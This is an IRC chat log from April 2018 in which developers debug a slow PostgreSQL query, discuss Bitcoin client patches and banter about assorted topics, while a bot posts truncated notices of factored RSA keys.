suggestion. what i mean by ACTUAL is that you don't use tmp 1805342;1524619684;mircea_popescu;but instead actually build the table you're trying to not-in, and do a join operation. 1805343;1524619699;asciilifeform;this is ruinously expensive when the dataset is 10s of GB. 1805344;1524619715;mircea_popescu;yes dood, that's why i said what i said re your way of thinking. 1805345;1524619760;asciilifeform;what am i missing, does mircea_popescu know of another way of thinking, that actually solves the problem with the available tooling at reasonable cost ? 1805346;1524619768;mircea_popescu;a db is a good tool for pre-given solutions for some kinds of problems. it is not a tool for implementing arbitrary expressivity. 1805347;1524619771;trinque;asciilifeform: what's the shape of * 1805348;1524619772;mircea_popescu;it's the anti-lisp. 1805349;1524619772;phf;mircea_popescu: maybe try this with foo as (select distinct unnest(mods) as mod from factors) select * from moduli left outer join foo on module.idx = foo.mod where foo.mod is null; 1805350;1524619772;asciilifeform;( reasonably cost being, 0 writes ) 1805351;1524619783;asciilifeform;trinque: what do you mean 'shape of' 1805352;1524619806;mircea_popescu;phf, i expect it'll still re-calc the temp on every pass. 1805353;1524619821;trinque;asciilifeform: what are the cols there that you want 1805354;1524619826;asciilifeform;phf: eggog, missing FROM-clause entry for table "module" LINE 1: ...tors) select * from moduli left outer join foo on module.idx... 1805355;1524619831;mircea_popescu;that's the only available juice to squeeze there, communicate to the engine that your db is slow, the tmp doesn't move. and you do this by not making it a tmp. 1805356;1524619831;asciilifeform;trinque: all of them. 1805357;1524619865;trinque;lol yes, that's what star means 1805358;1524619873;asciilifeform;i still don't grasp why the everliving fuck a 'not in ...' should be any slower than an 'in ....' 1805359;1524619882;mircea_popescu;asciilifeform, incidentally, your joins are all indexed yes ? 1805360;1524619887;asciilifeform;mircea_popescu: yes 1805361;1524619889;phf;mircea_popescu: i'm not sure that the problem is the recalculate, i think the problem is actually not in in combination with temp calculate 1805362;1524619912;mircea_popescu;phf, possibly, i'm not really THAT close to the core of that beast. 1805363;1524619943;asciilifeform;( naturally there are more results, by factor of 1,000 , in the 'not in ....', but outputting all 9+ mil mods from db without ~any~ filtration, takes about 7min ) 1805364;1524619957;trinque;asciilifeform: you know of "explain" ? 1805365;1524619961;trinque;and how to read it? 1805366;1524619979;phf;asciilifeform: oh there's a type 1805367;1524619983;phf;*typo 1805368;1524619996;phf;with foo as (select distinct unnest(mods) as mod from factors) select * from moduli left outer join foo on moduli.idx = foo.mod where foo.mod is null; 1805369;1524620024;mircea_popescu;asciilifeform, " select * from moduli where idx not in (select distinct unnest(mods) from factors)" << 1.make a new table ; 2.run "select distinct unnest(mods) from factors" and dump the result into this new table ; 3. index it by idx ; 4. run your select as an outer join between moduli and the new table. 1805370;1524620027;*;asciilifeform sets stopwatch... 1805371;1524620038;asciilifeform;i do. not. want. to. write. to. disk. 1805372;1524620051;asciilifeform;entirely sinks the thing. 1805373;1524620065;mircea_popescu;yeah well. 1805374;1524620081;trinque;I'm backing away. asking us to optimize a query in isolation for you without the explain and knowing nothing of your schema is ridiculous 1805375;1524620082;phf;you can keep from writing to disk by doing a materialized view. do a materialized view for your temp query, and then run second query against it. that would be my last resort though 1805376;1524620110;asciilifeform;trinque: i'ma stop polluting, at this point, the logs, and solve the problem programmatically outside of the abjectly retarded sqltron 1805377;1524620120;trinque;harumph! 1805378;1524620134;mircea_popescu;the only way out is if he ever gives up trying to ask sql for lisp support and instead writes his python around the sql like god meant it. 1805379;1524620135;asciilifeform;because it looks like sql is simply a 1970s ms winblowz, infinite font of unspeakable horror 1805380;1524620158;asciilifeform;mircea_popescu: this'd be in the actual cruncher, a c proggy 1805381;1524620159;mircea_popescu;asciilifeform, dude. it's a tool. like a steamroller. it does the following thing well : if you have cans, it makes them flat. 1805382;1524620164;trinque;nobody's here to defend sql to you, fucks sake 1805383;1524620170;mircea_popescu;it does nothing else. it doesn't impress chicks, it doesnm't win speed contests, it's not a car. 1805384;1524620172;trinque;you came in asking for help with the one you already stuck dick in. 1805385;1524620176;mircea_popescu;it's a piece of industrial machinery. 1805386;1524620177;asciilifeform;mircea_popescu: if not too many cans, and compass points in just the right direction and planets aligned... 1805387;1524620191;mircea_popescu;notrly, as evidenced by your 10gb dataset. 1805388;1524620220;mircea_popescu;just don't expect any backing to it for recursive elegance. it dun have what with. 1805389;1524620224;phf;asciilifeform: is the original query faster than the most last rewrite? asking for personal enlightenment 1805390;1524620225;mircea_popescu;backing from it* 1805391;1524620232;asciilifeform;oh hey, phf's algo appears to work 1805392;1524620238;asciilifeform;nao all i gotta do is find out why... 1805393;1524620249;asciilifeform;ty phf ! 1805394;1524620306;mircea_popescu;because he's doing what i told you to do discreetely. 1805395;1524620341;mircea_popescu;which i must grant he's very good at. 1805396;1524620478;asciilifeform;interestingly, phf's algo worx from cmdline but not from PQexec("....") 1805397;1524620484;asciilifeform;( where it returns nil ) 1805398;1524620531;phf;huh 1805399;1524620535;asciilifeform;ikr! 1805400;1524620654;phf;perhaps try select * from moduli left outer join (select distinct unnest(mods) as mod from factors) as foo on moduli.idx = foo.mod where foo.mod is null 1805401;1524620675;phf;but there's only so few rabbis i can pull out of a hat 1805402;1524620752;asciilifeform;ah what i needed was 'select mod from ...' and so ends up with 'column reference 'mod' is ambiguous' 1805403;1524620824;asciilifeform;amazing, how many old rusty razors this steamroller has randomly glued to the controls, to the seat, to the floor... 1805404;1524621201;*;asciilifeform found , seems , a working formulation, set up experiment... 1805405;1524621211;asciilifeform;ty phf , trinque , mircea_popescu 1805406;1524621236;mircea_popescu;no, by all means, i like watching the "alf encounters technology" hour :D 1805407;1524621356;phf;i treat the exercise as a chinese room wired to explosives. making a mistake elevates danger level, passage of time elevates danger level, there's a random factor when it's going to blow anyway, etc. 1805408;1524621415;asciilifeform;lol 1805409;1524622092;mircea_popescu;but at least he's not militantly howeveritwent. 1805410;1524622644;mircea_popescu;meanwhile in lulz from the eternal lulzer, http://fortune.com/2018/02/27/apple-steve-wozniak-bitcoin-theft/ 1805411;1524624606;douchebag;lolol 1805412;1524626557;mod6;Lords and Ladies of the Republic, I present to this chamber my findings on the Raw Transactions Back-Port Exercise: http://therealbitcoin.org/ml/btc-dev/2018-April/000297.html 1805413;1524626622;mod6;I am currently in the early stages of next steps; re-implementation within the existing framework. More to come on that front as I have updates. 1805414;1524626753;phf;heh, main changes in recent versions of slime: additions of mezzano interaction (lisp "operating system"), but the lulzy part additions of large variety of deprecation errors and warnings. 1805415;1524626774;mod6;who needs those! 1805416;1524626943;phf;ah apparently deprecation "framework" exists in sbcl since 1.0.50.. 1805417;1524627025;mircea_popescu;how exactly does this work, something can "deprecate" in lisp ? 1805418;1524627033;mircea_popescu;i thought it had a standards document and everything. 1805419;1524627282;phf;anything that's not covered by standard, but is available in the implementation, like threading 1805420;1524627333;phf;though sbcl found a way to fuck with the standard do, using style warnings (ambiguity in the standard can be encouraged in a specific direction along the "mktemp is unsafe!1" lines) 1805421;1524627364;trinque;mod6: I've got a sendrawtxn patch sitting over here 1805422;1524627452;trinque;got one that rips out the noui.h idiocy too, and a few others that need finishing before I fork a walletless trb 1805423;1524627466;trinque;(got the walletless patch too; trb node on pizarro is walletless) 1805424;1524627504;trinque;I'm blocked on not having the manifest, so next on my plate is to regrind every patch with a manifest entry. 1805425;1524628288;trinque;mod6: what was wrong with polarbeard's exactly? my patch is more or less his. 1805426;1524628380;phf;trinque: there wasn't anything wrong with polarbeard's patches in general, he just happened to be doing his work when there was a lot of regrinds going on in the tree and after third time he was asked to regrind he decided he had enough and quit 1805427;1524628426;trinque;ah too bad 1805428;1524628460;mod6;Yeah, nothing really wrong there I suppose, as stated, basically undertook the exercise as "educational". Just to see what could be done. 1805429;1524628499;mod6;I've been working a bit further on my own, seeing how it could be done by what exists. I should look back at polarbeards stuff too. 1805430;1524628541;mod6;but hey hey! trinque: if you're sitting on some patches for this, please send along when you get the manifest part working. 1805431;1524628585;trinque;yeah sure will. 1805432;1524628614;mod6;re: polarbeard is right, guy simply isn't in the wot (afaik), so partly, I'm trying to solution on my own without polluting my path too much. 1805433;1524628616;mircea_popescu;phf, wasn;t actually three times was it ? 1805434;1524628636;mod6;bah. *re: polarbeard, phf is right... 1805435;1524628639;mircea_popescu;he made one megapatch, people were like "yeah, nice, now split it out in bits" ; he tried but didn't find a ready way to do it and kinda went silent. 1805436;1524628642;trinque;mod6: "patch exists" is no reason to not go exploring on your own 1805437;1524628644;trinque;for sure 1805438;1524628699;mod6;That said, it doesn't make a ton of sense to be off tilting at wind-mills if there are already reasonable solutions. 1805439;1524628707;trinque;the wallet rm -rf is something of a megapatch, but at least mostly redlining. 1805440;1524628709;mod6;So im trying to balance all that a bit. 1805441;1524628723;mod6;trinque: werd. 1805442;1524628756;trinque;I don't expect to make that one mainline "trb" though, unless somewhere down the line somebody also breaks off script.cpp into a tx compiler, breaks off a signer, etc 1805443;1524628790;*;trinque will keep the spatchcocking to his own blog for now 1805444;1524628829;mod6;sure, you're doing good work. looking forward to your submissions when ready. 1805445;1524628891;trinque;http://p.bvulpes.com/pastes/aiEVS/?raw=true << sneak peek of walletsnip. (warning, likely intermingled with other patches, not for any use, etc) 1805446;1524628895;phf;mircea_popescu: he had one megapatch that i remember being somewhat controversial, it's the one where he reworked the logging facility, but the other two look reasonably small (rm unused functions and add sendrawtransaction rpc). i remember there being some issues with asciilifeform_malleus_mikehearnificarum and asciilifeform-programmable-versionstring that required at least two regrinds, which was around the time he was working on his. 1805447;1524628899;mircea_popescu;but in the general i suppose polarbeard's adventure is kinda illustrative of YET ANOTHER failure mode of personal heroics. besides the "lalala i can't hear" style there's apparently also the "oh, who has time for small steps, i'ma make huge contributions as a virtual unknown". 1805448;1524628929;mod6;<+trinque> mod6: I've got a sendrawtxn patch sitting over here << actually, i should mention that i /did/ create a trb sendrawtransaction (just this one rpc call) vpatch late last year, but never sent -- really wanted the rest of the gang 'create', 'sign', etc. 1805449;1524628938;mircea_popescu;phf, a yeah, there was some of that too, it's coming back to me now. 1805450;1524628983;trinque;mod6: yeah makes sense. not much use by itself without. 1805451;1524628991;mod6;yup. 1805452;1524629044;phf;yeah, it was a combination of factors. his logging facility patch received a lot of criticism, though i now regret voicing mine. it's a bit of a bike shed problem, everyone has their own idea of how to do it "right", but it's not done to this day. 1805453;1524629069;mircea_popescu;myeah. 1805454;1524629085;mod6;phf: this is a solid point. I think everyone wants their own way of logging/logging statements. 1805455;1524629108;mircea_popescu;goes right back to the problem of the unknown. i CAN shoot down bikeshedding if i know the person. i can't if they're unknown, because then it's legitimate part of dogs sniffing butts getting to know each other. 1805456;1524629128;mod6;One vpatch that is looking pretty nice is ben_vulpes's logging sub-string chop chop. 1805457;1524629165;mod6;mircea_popescu: yeah. 1805458;1524629258;trinque;http://p.bvulpes.com/pastes/NweRz/?raw=true << polarbeard_better_log_messages.vpatch reposted from shithub, for posteriority 1805459;1524629281;phf;or you know http://btcbase.org/patches/polarbeard_better_log_messages 1805460;1524629328;trinque;oh whoops 1805461;1524629335;phf;also http://btcbase.org/patches/polarbeard_rm_unused_functions http://btcbase.org/patches/polarbeard_add_sendrawtransaction_rpc 1805462;1524629360;trinque;I forgot you had the wandering patches too. 1805463;1524629389;mod6;thx for posting the links gentlemen. 1805464;1524629390;phf;aha, it's either in experimental or in deprecated 1805465;1524629428;trinque;long day, little sleep. spent the morning directing movers. 1805466;1524629465;phf;!!key polarbeard 1805467;1524629466;deedbot;http://wot.deedbot.org/3db7d131fe4fff3ca6bbac3011cc9042929d3682.asc 1805468;1524629489;phf;also 2016-01-17 1805469;1524629516;trinque;to digress, one of the guys called the porch a "pollo" and I swear he was fucking with me. 1805470;1524629655;trinque;after that, he says his computer didn't work (hey, you're a computer guy, right?) and showed me a picture of a dell laptop docking station, so who knows. maybe he goes out and drinks beer on his chicken 1805471;1524629706;douchebag;!drink-beer-on-chicken 1805472;1524629755;mircea_popescu;pivapollo 1805473;1524629916;trinque;what's that mean? 1805474;1524629918;deedbot;http://phuctor.nosuchlabs.com/gpgkey/072ECA8C1F9304988F62531F1A8EE157D49BD61F04CB7733DC3837402628FA96 << Recent Phuctorings. - Phuctored: 1248...7653 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown DE HE) 1805475;1524629918;deedbot;http://phuctor.nosuchlabs.com/gpgkey/D681AE14C7C11C938C785738A794228A1507D33261DE7421D16571566DCC42AF << Recent Phuctorings. - Phuctored: 2104...9369 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown LV) 1805476;1524629918;deedbot;http://phuctor.nosuchlabs.com/gpgkey/8BC5E3C9850D306301F23F8696D897F052AA8DAC59C95AAE9BF58FB5734B0C50 << Recent Phuctorings. - Phuctored: 1476...3239 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (routed.by.netground.nl. NL) 1805477;1524629974;phf;pivo and pollo mexican russian fusion food odessa, tx 1805478;1524630059;trinque;ahaha, https://dictionary.reverso.net/spanish-english/pavipollo 1805479;1524630062;trinque;I got got 1805480;1524630208;mircea_popescu;lmao 1805481;1524630402;mircea_popescu;"Odessa is a city in western Texas. Downtown, Jack Ben Rabbit is an 8-foot-tall statue of a jackrabbit. " 1805482;1524630419;mircea_popescu;if anything screams "deserted midwest" more than these "tall statue" shenanigans... 1805483;1524630448;mircea_popescu;someone somewhere has like... a very large pitchfork or something. "town attraction" "why, because you folk spend too long in the sun ?" 1805484;1524630547;phf;well it's the world's LARGEST jackrabbit, so ya gotta see it! 1805485;1524630764;mircea_popescu;kinda the same mental process that impels doods to save their largest booger. 1805486;1524630826;mircea_popescu;"As in many municipalities, some of the largest employers are in the education, government, and healthcare industries." 1805487;1524630827;mircea_popescu;right. 1805488;1524630832;mircea_popescu;totallynotaponzi.jpg 1805489;1524630873;mod6;I went through midland/odessa once, didn't stop. Kept foot on gas. 1805490;1524630903;mod6;"This is the birthplace of First Lady Laura Bush!" ... zoooooom 1805491;1524631026;mod6;That day I think I set a PR for furthest driven in one single day: OKC->Dallas->El Paso->Tucson 1805492;1524631079;trinque;lots of oil out there; only real reason to go 1805493;1524631092;mod6;yeah, i remember smelling it in the air. 1805494;1524637670;diana_coman;http://btcbase.org/log/2018-04-24#1805245 <- for the light+clean gentoo factor I'd buy one but I can't say I see atm a case for buying a lot of them 1805495;1524637670;a111;Logged on 2018-04-24 23:41 asciilifeform: mircea_popescu, diana_coman , et al, other folx who travel -- i'd like to get a picture of whether there is 'market' in l1/l2 for a pre-engentooated ( laugh at the laddel-ism, but it promises to be a somewhat painful process involving crocodile and eeprom writer ) 'c101pa' rockchip lappy . 1805496;1524637758;mircea_popescu;is that a pun ? 1805497;1524644843;spyked;http://btcbase.org/log/2018-04-25#1805483 <-- oh, youmeanlike https://imgur.com/a/6d5Atjc ? 1805498;1524644843;a111;Logged on 2018-04-25 04:27 mircea_popescu: someone somewhere has like... a very large pitchfork or something. "town attraction" "why, because you folk spend too long in the sun ?" 1805499;1524644974;diana_coman;lol, unintended! 1805500;1524645236;spyked;the biggest win point is imho the chair they placed there: "please sir, to admire this fine fork" 1805501;1524661556;mod6;Mornin' TMSR~ 1805502;1524666082;asciilifeform;!Q later tell spyked http://www.loper-os.org/?p=2295&cpage=1#comment-19403 1805503;1524666083;lobbesbot;asciilifeform: The operation succeeded. 1805504;1524669983;asciilifeform;http://btcbase.org/log/2018-04-25#1805475 << lol somehow nobody but me noticed the bug. i fixed it this morning, all that remains is to clean the crapola from the db, will do this after backup 1805505;1524669983;a111;Logged on 2018-04-25 04:18 deedbot: http://phuctor.nosuchlabs.com/gpgkey/D681AE14C7C11C938C785738A794228A1507D33261DE7421D16571566DCC42AF << Recent Phuctorings. - Phuctored: 2104...9369 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown LV) 1805506;1524670031;asciilifeform;http://btcbase.org/log/2018-04-25#1805494 << i can't picture who ( other than mircea_popescu in his described possible use case ) would need more than 1 ( or perhaps 2, 1 as a spare ) 1805507;1524670031;a111;Logged on 2018-04-25 06:27 diana_coman: http://btcbase.org/log/2018-04-24#1805245 <- for the light+clean gentoo factor I'd buy one but I can't say I see atm a case for buying a lot of them 1805508;1524670046;asciilifeform;original q was 'is this worth doing at all' 1805509;1524670091;asciilifeform;( possibly also it is better to have folx purchase the raw material locally, and flash the rom themselves ? ) 1805510;1524670246;asciilifeform;http://btcbase.org/log/2018-04-25#1805426 << not quite how i remember it. d00d was demonstrably inadherent to the concept of vpatch hygiene , persisted with creation of shithub-style megaturds 1805511;1524670246;a111;Logged on 2018-04-25 03:53 phf: trinque: there wasn't anything wrong with polarbeard's patches in general, he just happened to be doing his work when there was a lot of regrinds going on in the tree and after third time he was asked to regrind he decided he had enough and quit 1805512;1524670273;asciilifeform;he didn't seem to grasp the notion that the patches are meant to be read and understood. 1805513;1524670307;asciilifeform;and gotta narrowly focus on subject, rather than 'hey look i turned 17 knobs at once' 1805514;1524670374;asciilifeform;http://btcbase.org/log/2018-04-25#1805447 << exactly that. iirc he said nothing at all re own biography, on top of it all. 1805515;1524670374;a111;Logged on 2018-04-25 04:01 mircea_popescu: but in the general i suppose polarbeard's adventure is kinda illustrative of YET ANOTHER failure mode of personal heroics. besides the "lalala i can't hear" style there's apparently also the "oh, who has time for small steps, i'ma make huge contributions as a virtual unknown". 1805516;1524670407;asciilifeform;!#born polarbeard 1805517;1524670407;a111;2016-01-22 hi 1805518;1524670407;a111;http://btcbase.org/log/2016-01-22#1381744 1805519;1524670873;asciilifeform;http://btcbase.org/log/2018-04-25#1805414 << mezzano seems -- since i last looked -- to be almost enuff to make an actual workstation os out of , if anybody bothered to get hold of a e.g. apu1 with sage snake and tailor it properly to the iron 1805520;1524670873;a111;Logged on 2018-04-25 03:25 phf: heh, main changes in recent versions of slime: additions of mezzano interaction (lisp "operating system"), but the lulzy part additions of large variety of deprecation errors and warnings. 1805521;1524670885;asciilifeform;i could be wrong about this, did not dig in deeply 1805522;1524670910;asciilifeform;( there doesn't appear to be a self-eating compiler in'ere... ) 1805523;1524670964;asciilifeform;( lives -- yes -- on shithub; https://github.com/froggey/Mezzano/tree/master/drivers << all he's got in the way of iron ) 1805524;1524670994;asciilifeform;spoiler: rtl8168 nic, possibly the vmware version thereof; and intel's sound card. 1805525;1524671016;asciilifeform;( last thread iirc re subj : http://btcbase.org/log/2016-09-17#1544064 << see also. ) 1805526;1524671016;a111;Logged on 2016-09-17 16:40 asciilifeform: and the hardware ~is~ shit. boot up one of these (if you can actually get it to boot.) and say hello to 1 fps graphics, disks without dma (you don't know what these feel like until trying personally), nic that works when the moon is full strictly, etc. 1805527;1524675702;deedbot;http://phuctor.nosuchlabs.com/gpgkey/FBE9CAAEB56006891661FBC0C2AEC1BCC7580E89A6EE8AA23C0ED6DA820D46C2 << Recent Phuctorings. - Phuctored: 1509...8807 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown IT RM 62) 1805528;1524675702;deedbot;http://phuctor.nosuchlabs.com/gpgkey/282A739B467BDDEDDAE8B492C5867C45724562DAE71039CB18971F5CB821090D << Recent Phuctorings. - Phuctored: 1509...8807 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown US AR) 1805529;1524676104;deedbot;http://www.thedrinkingrecord.com/2018/04/25/racism-in-pigeons/ << Bingo Blog - Racism In Pigeons 1805530;1524676927;BingoBoingo;!!Up trinax 1805531;1524676927;deedbot;trinax voiced for 30 minutes. 1805532;1524679376;deedbot;http://www.thedrinkingrecord.com/2018/04/25/remedial-skills-camera-walk-rtfm-edition/ << Bingo Blog - Remedial Skills: Camera Walk RTFM Edition 1805533;1524679469;mircea_popescu;asciilifeform, sure it's worth doing at all. you need >1 per agent, what. 1805534;1524679508;asciilifeform;mircea_popescu: i'ma put it in the queue then. ( machine per se, came in last night ) 1805535;1524679666;asciilifeform;physically impressive thing, almost small enuff to conceal under clothing 1805536;1524679673;mircea_popescu;lol ro embassy. 1805537;1524679674;asciilifeform;( about 1cm thick ) 1805538;1524679750;mircea_popescu;ahahaha this guy. "lawn colored bird" "rock colored bird". 1805539;1524679757;BingoBoingo;mircea_popescu: Seriously, most hoppable fence of them all so far. Except well, Panama but they don't have a fence at all. Front door opens into the street. 1805540;1524679778;phf;asciilifeform: i would be pleasantly surprised if the machine can have a blobless video/wifi 1805541;1524679787;mircea_popescu;yes well, not everyone's an asshole. i don't recall the last time someone came up with the idea of assaulting ro embassies. 1805542;1524679868;asciilifeform;phf: whole spark of asciilifeform's interest in the '101' was that it has marvell wifi chip (on usb) and apparently nonaccelerated 2d worx with standard kernel 1805543;1524679891;asciilifeform;unlike the chromenintendo i experimented on in 2013 1805544;1524679892;*;BingoBoingo still finding new embassies. 1805545;1524679935;asciilifeform;phf: machine seems to be something quite like the pizarro rockchip board but with screen,kbd,battery 1805546;1524680043;mod6;Nice pics BingoBoingo, funny comments too 1805547;1524680052;BingoBoingo;mod6: ty 1805548;1524680073;BingoBoingo;Still need a lot more practice 1805549;1524680227;phf;asciilifeform: aha, i figured as much, idle curiosity about where the hardware boundaries lie. we'll find out soon enough! 1805550;1524681160;deedbot;http://trilema.com/2018/joes-enthusiasm/ << Trilema - Joe's enthusiasm 1805551;1524684939;deedbot;http://qntra.net/2018/04/german-jews-warned-to-wear-alternate-headgear-to-avoid-violence/ << Qntra - German Jews Warned To Wear Alternate Headgear To Avoid Violence 1805552;1524685063;mircea_popescu;aaahahahaa 1805553;1524685068;ben_vulpes;who could have predicted!!1 1805554;1524685082;mircea_popescu;such a good thing five successive generations of nulands did in germany. 1805555;1524685093;mircea_popescu;it's always a good idea to listen to "the experts". 1805556;1524685174;BingoBoingo;4srs 1805557;1524686348;mircea_popescu;in other random, https://www.youtube.com/watch?v=arJlvynifMc 1805558;1524688135;spyked;http://btcbase.org/log/2018-04-25#1805502 <-- o hey, tyvm! 1805559;1524688135;a111;Logged on 2018-04-25 14:21 asciilifeform: !Q later tell spyked http://www.loper-os.org/?p=2295&cpage=1#comment-19403 1805560;1524688135;lobbesbot;spyked: Sent 6 hours and 7 minutes ago: http://www.loper-os.org/?p=2295&cpage=1#comment-19403 1805561;1524688748;asciilifeform;spyked: http://www.loper-os.org/?p=2295&cpage=1#comment-19407 1805562;1524688984;mircea_popescu;but in other good news, trilema discovered the fastest reader alive : http://trilema.com/contact-pgp/#comment-125468 1805563;1524691830;deedbot;http://phuctor.nosuchlabs.com/gpgkey/072ECA8C1F9304988F62531F1A8EE157D49BD61F04CB7733DC3837402628FA96 << Recent Phuctorings. - Phuctored: 1008...7769 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown DE HE) 1805564;1524692469;mircea_popescu;hey phf can i get a count of words / day in my loglines ? 1805565;1524692901;deedbot;http://phuctor.nosuchlabs.com/gpgkey/8BC5E3C9850D306301F23F8696D897F052AA8DAC59C95AAE9BF58FB5734B0C50 << Recent Phuctorings. - Phuctored: 1349...8697 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (routed.by.netground.nl. NL) 1805566;1524693454;deedbot;http://phuctor.nosuchlabs.com/gpgkey/D681AE14C7C11C938C785738A794228A1507D33261DE7421D16571566DCC42AF << Recent Phuctorings. - Phuctored: 1434...9433 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown LV) 1805567;1524694168;mod6;!!deed http://p.bvulpes.com/pastes/4JgmI/?raw=true 1805568;1524694438;deedbot;accepted: 1 1805569;1524694512;trinque;ugh, shame on me. that was running in a tmux 1805570;1524694550;trinque;massive uptime has its upsides and down 1805571;1524694567;deedbot;http://phuctor.nosuchlabs.com/gpgkey/0FC58288ECBC1BDAD86A1D99D09C2B85517E02A72390F6CFB378AF87AAB6840F << Recent Phuctorings. - Phuctored: 1469...5969 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown DE NI) 1805572;1524695586;danielpbarron;!!up beeteecee 1805573;1524695586;deedbot;beeteecee voiced for 30 minutes. 1805574;1524695671;deedbot;http://phuctor.nosuchlabs.com/gpgkey/5D01732429D2018C5281E02A054FF943984DC18BC2575AB67B16151BDE5C3FCA << Recent Phuctorings. - Phuctored: 1434...3997 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown US TX) 1805575;1524698118;deedbot;http://deedbot.org/bundle-519925.txt 1805576;1524698766;ben_vulpes;whoa 1805577;1524700011;deedbot;http://trilema.com/2018/what-have-i-been-doing/ << Trilema - What have I been doing ? 1805578;1524701131;deedbot;http://www.loper-os.org/?p=2326 << Loper OS - Open Problem: Delousing the Asus C101PA. 1805579;1524702132;mircea_popescu;!!pay danielpbarron 0.0077 1805580;1524702136;deedbot;Get your OTP: http://p.bvulpes.com/pastes/A0AM0/?raw=true 1805581;1524705233;asciilifeform;meanwhile, in technical progresses, https://archive.li/kA5TT >> spoof GPS, GSM, with... 5bux of usb to vga adapter 1805582;1524706055;mircea_popescu;heh 1805583;1524711517;mircea_popescu;is that the last of ;em ? 1805584;1524711525;mircea_popescu;!!up shurdeek 1805585;1524711526;deedbot;shurdeek voiced for 30 minutes. 1805586;1524711533;mircea_popescu;got a rsa key shurdeek ? 1805587;1524712854;ben_vulpes;http://logs.bvulpes.com/trilema?d=2018-4-25#343759 << just one tiny step up from excel 1805588;1524712855;mimisbrunnr;Logged on 2018-04-25 01:18 mircea_popescu: a db is a good tool for pre-given solutions for some kinds of problems. it is not a tool for implementing arbitrary expressivity. 1805589;1524712952;trinque;ben_vulpes: you should hear my oil buddy talk about excel sometime 1805590;1524712963;ben_vulpes;that said the rigorish typing of postgres has been a boon in this one circumstance where the tower of complexititus threatens to overwhelm me at every step 1805591;1524712970;trinque;dunno if it'll make you laugh or cry, but either's good drinking 1805592;1524713050;ben_vulpes;trinque: you know i tell folks i squirt grease on the largest $problem-domain spreadsheet they could possibly imagine when they ask what i do; i can laugh and cry about it allll day 1805593;1524713138;ben_vulpes;btw mircea_popescu #templeos-irc is a wall of noise, terry is out to lunch 1805594;1524713166;mircea_popescu;ben_vulpes, i dun agree ; excel is clown car. the db stuff... not really. 1805595;1524713264;ben_vulpes;sure, john deere with anal impaler in operator seat 1805596;1524713275;ben_vulpes;when will it fire will it fire today let's find out 1805597;1524713312;ben_vulpes;i exaggerate, db constraints and stored procedures and transactionality and permissions are all very nice things. 1805598;1524713338;mircea_popescu;unlike vbasic and moreover, the very fucking NOTION of "here is a list of cells, grapghically displayed" 1805599;1524713349;mircea_popescu;worst possible assumptions made for this gui-centric non-db system. 1805600;1524713379;mircea_popescu;that it's popular with the sort of meat puppets populating the pantsuit vatfarms is unsurprising -- it's pretty much engineered to cater to their batshit insane worldview. 1805601;1524713409;mircea_popescu;there's a very deep link between "putin doesn't understand how the world works ; notwithstanding which he stole our election" and "cell (5,7) on your screen". 1805602;1524713469;ben_vulpes;links to the ml advocates, their jupyter notebooks, and the troubles they have "getting from research to production" too i'd hazard 1805603;1524713524;mircea_popescu;certainly links to "aaaand... it's gone", http://trilema.com/2013/why-mpex-is-better-than-fiat-institutions-part-349085-we-dont-use-excel/#selection-171.0-173.563 etc 1805604;1524713801;ben_vulpes;"can never demonstrate the absence of bugs" notwithstanding, i don't know why folks don't slow down and test that their deliverables do what they claim before making claims 1805605;1524713830;*;trinque sees untested deliverables on two legs every day 1805606;1524713885;ben_vulpes;breathing! passes self test 1805607;1524713920;ben_vulpes;hey, one of my deliverables failed the external tests once 1805608;1524714077;trinque;re: db, I'm reserving a lul now for when asciilifeform discovers that postgresql does, in fact, tell you what an operation will cost before you run it. 1805609;1524714275;trinque;mircea_popescu had it, industrial machinery, organizes gigantic sets, does a few things to make sure the wad isn't lost. 1805610;1524714433;trinque;goodnight, many heads of the tit hydra 1805611;1524727192;deedbot;http://phuctor.nosuchlabs.com/gpgkey/1CB26FAAEE6F4F6C493FEDAB70602DD6771C643BEBABD7AFBD51B72D0CE51A8D << Recent Phuctorings. - Phuctored: 1566...6727 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (64-129-88-132.static.ctl.one. US TN) 1805612;1524727718;deedbot;http://phuctor.nosuchlabs.com/gpgkey/0FC58288ECBC1BDAD86A1D99D09C2B85517E02A72390F6CFB378AF87AAB6840F << Recent Phuctorings. - Phuctored: 1549...5317 divides RSA Moduli belonging to ' (ssh-rsa key from (13-14 June 2016 extraction) for Phuctor import. Ask asciilifeform or framedragger on Freenode, or email fd at mkj dot lt) ; ' (Unknown DE NI) 1805613;1524727718;deedbot;http://phuctor.nosuchlabs.com/gpgkey/ACA7CBF1B441A8D2E63CD93CEAF781222E39F4662CBFFB1A70D508FA3610C59C << Recent Phuctorings. - Phuctored: 